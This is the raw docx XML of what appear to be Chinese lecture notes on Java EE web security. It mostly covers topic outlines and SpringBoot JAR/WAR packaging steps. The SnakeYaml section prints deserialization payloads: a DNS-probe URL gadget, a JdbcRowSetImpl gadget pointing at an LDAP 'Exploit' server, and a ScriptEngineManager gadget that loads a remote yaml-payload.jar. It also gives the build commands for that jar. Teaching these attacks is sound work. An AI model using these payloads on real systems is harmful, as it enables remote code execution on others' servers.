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6D53" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5C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开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;SpringBoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;SnakeYaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>反序列化链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;JAR&amp;WAR&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构建打包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769D98D" w14:textId="08BC31C9" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5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F4431CE" wp14:editId="08B4520B">
            <wp:extent cx="5274310" cy="1901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CC3E" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5C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-Maven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-Mybatis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-Hibernate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类加载器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反射机制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成员变量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-JavaEE-readObject&amp;toString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-JavaEE-FastJson-JdbcRowSetImpl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-LADP&amp;RMI&amp;DNS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手工原理等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第三方依赖开发安全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&amp;FastJson&amp;XStream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-JavaEE-Shiro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&amp;Log4j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日志处理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-SpringBoot&amp;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路由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-Thymeleaf&amp;Freemarker&amp;Velocity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常见依赖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-Actuator&amp;Swagger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-JWT&amp;Security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不安全写法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-JavaEE-WAR&amp;JAR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-JavaEE-SnakeYaml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2F672E15" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5C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245FA104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-JavaEE-Servlet&amp;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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0D193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过滤器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Filter&amp;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监听器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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164B3F1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-JavaEE-Maven&amp;JDBC&amp;Mybatis&amp;Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57FF96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-JavaEE-ORM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预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF511EE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类加载器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反射机制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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBDBBCA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成员变量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构造方法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成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA169E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动态代理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</w:p>
    <w:p w14:paraId="23A263F9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利用链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危险方法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重写方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E20041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原生反序列化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&amp;URLDNS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24308B51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-JavaEE-FastJson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&amp;JDBC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755D63C3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-JavaEE-JNDI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&amp;LDAP&amp;RMI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服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC918AB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第三方依赖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-FastJson&amp;XStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC41018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第三方依赖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-Shrio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验证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&amp;Log4j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日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA367F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-SpringBoot&amp;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传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF96E72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模版引擎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Thymeleaf&amp;Freemarker&amp;Velocity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0EC9C0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监控依赖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-SpringBoot&amp;Actuator&amp;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配置安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255ECFC0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-JavaEE-API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-SpringBoot&amp;Swagger&amp;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接口测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154BC1C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身份验证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-JWT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令牌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&amp;Security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机制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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC16353" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5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项目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-SnakeYaml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&amp;JAR&amp;WAR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打包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C493C" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5C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常见的创建的序列化和反序列化协议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（已讲）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writeObject()/readObject()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 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XMLDecoder()/XMLEncoder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xml&lt;==&gt;Object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（已讲）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XStream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xml&lt;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==&gt;O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bject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（已讲）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SnakeYaml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yaml&lt;==&gt;Object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（已讲）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FastJson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json&lt;==&gt;Object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 Jackson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json&lt;==&gt;Object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#SnakeYaml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SnakeYaml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中解析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yaml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的库，而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yaml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是一种人类可读的数据序列化语言，通常用于编写配置文件等。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&lt;groupId&gt;org.yaml&lt;/groupId&gt;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&lt;artifactId&gt;snakeyaml&lt;/artifactId&gt;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&lt;version&gt;1.32&lt;/version&gt;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SnakeYaml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Yaml.dump()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Yaml.load()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两个函数对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yaml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格式的数据进行序列化和反序列化：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Yaml.load()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：入参是一个字符串或者一个文件，经过反序列化之后返回一个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Yaml.dump()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：序列化将一个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对象转化为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yaml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文件形式；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测试总结：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loadas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都调用了对应的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hyperlink r:id="rId6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https://www.cnblogs.com/F12-blog/p/18151239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链（自带链）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!!java.net.URL ["http://5dsff0.dnslog.cn/"]: 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!!com.sun.rowset.JdbcRowSetImpl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dataSourceName: "ldap://localhost:1389/Exploit"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autoCommit: true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（自带链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机制）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https://github.com/artsploit/yaml-payload/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javac AwesomeScriptEngineFactory.java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jar -cvf yaml-payload.jar -C src/ .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项目结构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添加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-yaml-payload-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添加模块输出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 -m http.server 9999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!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1:9999/yaml-payload.jar"]]]]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#SpringBoot-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打包部署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-JAR&amp;WAR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https://mp.weixin.qq.com/s/HyqVt7EMFcuKXfiejtfleg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SpringBoot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项目打包在各类系统服务器中运行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:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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类型项目使用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SpringBoot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打包插件打包时，会在打成的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中内置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。所以使用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直接运行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即可，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项目中功能将代码放到其内置的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中运行。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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在打包时需要将内置的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插件排除，配置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的依赖和修改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pom.xml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，然后将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文件放到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安装目录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webapps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启动运行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自动解析即可。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报错解决：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https://blog.csdn.net/Mrzhuangr/article/details/124731024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https://blog.csdn.net/wobenqingfeng/article/details/129914639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maven-clean-package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 -jar xxxxxx.jar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pom.xml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加入或修改：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&lt;packaging&gt;war&lt;/packaging&gt;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、启动类里面加入配置：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public class TestSwaggerDemoApplication extends SpringBootServletInitializer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@Override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protected SpringApplicationBuilder configure(SpringApplicationBuilder builder)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return builder.sources(TestSwaggerDemoApplication.class);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maven-clean-package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后启动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JAVAEE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源码架构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无源码下载泄漏风险，源码泄漏也需反编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6253B9" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5C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7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19329A47" w14:textId="77777777" w:rsidR="00273B5C" w:rsidRDefault="00273B5C" w:rsidP="00273B5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44876B25" w14:textId="77777777" w:rsidR="00A34F20" w:rsidRDefault="00A34F20"/>
    <w:sectPr w:rsidR="00A3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6613C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E90869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60"/>
    <w:rsid w:val="00264960"/>
    <w:rsid w:val="00273B5C"/>
    <w:rsid w:val="00A3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B4AE0-A34A-4709-BE9F-6F4887AC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273B5C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73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3B5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3B5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73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q.com/doc/DQ3Z6RkNpaUtM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F12-blog/p/1815123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2025-03-06T14:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-06T14:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>